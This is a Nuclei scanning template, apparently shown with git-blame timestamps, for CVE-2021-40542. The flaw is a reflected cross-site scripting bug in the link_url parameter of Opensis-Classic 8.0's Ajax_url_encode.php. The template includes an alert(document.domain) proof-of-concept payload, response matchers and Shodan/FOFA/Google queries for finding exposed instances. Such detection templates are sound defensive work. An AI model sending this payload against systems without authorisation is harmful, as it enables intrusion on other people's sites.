2021-11-25 18:22:30 +00:00
id : CVE-2021-40542
info :
2022-09-09 17:34:37 +00:00
name : Opensis-Classic 8.0 - Cross-Site Scripting
2021-11-25 18:22:30 +00:00
author : alph4byt3
severity : medium
2022-04-29 19:58:07 +00:00
description : |
Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.
2023-09-06 12:09:01 +00:00
remediation : |
To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
2021-11-25 18:22:30 +00:00
reference :
- https://github.com/OS4ED/openSIS-Classic/issues/189
- https://nvd.nist.gov/vuln/detail/CVE-2021-40542
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2021-11-25 18:22:30 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-04-22 16:21:28 +00:00
cve-id : CVE-2021-40542
2021-11-25 18:22:30 +00:00
cwe-id : CWE-79
2024-05-31 19:23:20 +00:00
epss-score : 0.00342
epss-percentile : 0.71484
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*
2022-07-10 09:37:25 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : os4ed
product : opensis
2024-06-07 10:04:29 +00:00
shodan-query :
- http.title:"openSIS"
- http.title:"opensis"
2024-05-31 19:23:20 +00:00
fofa-query : title="opensis"
google-query : intitle:"opensis"
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,xss,opensis,os4ed
2021-11-25 18:22:30 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-25 18:22:30 +00:00
- method : GET
path :
2021-12-03 07:12:37 +00:00
- '{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-11-25 18:22:30 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2021-12-03 07:12:37 +00:00
- "</script><script>alert(document.domain)</script>"
2021-11-25 18:22:30 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 490a0046304402202cc2f7373c80af1c87453ca77a6c642ffc9694f0b651ba72be8790a389c97066022063d045826ec64715d6c6758801bc888a2cbbc225a836a9b7518c2db506143520:922c64590222798bb761d5b6d8e72950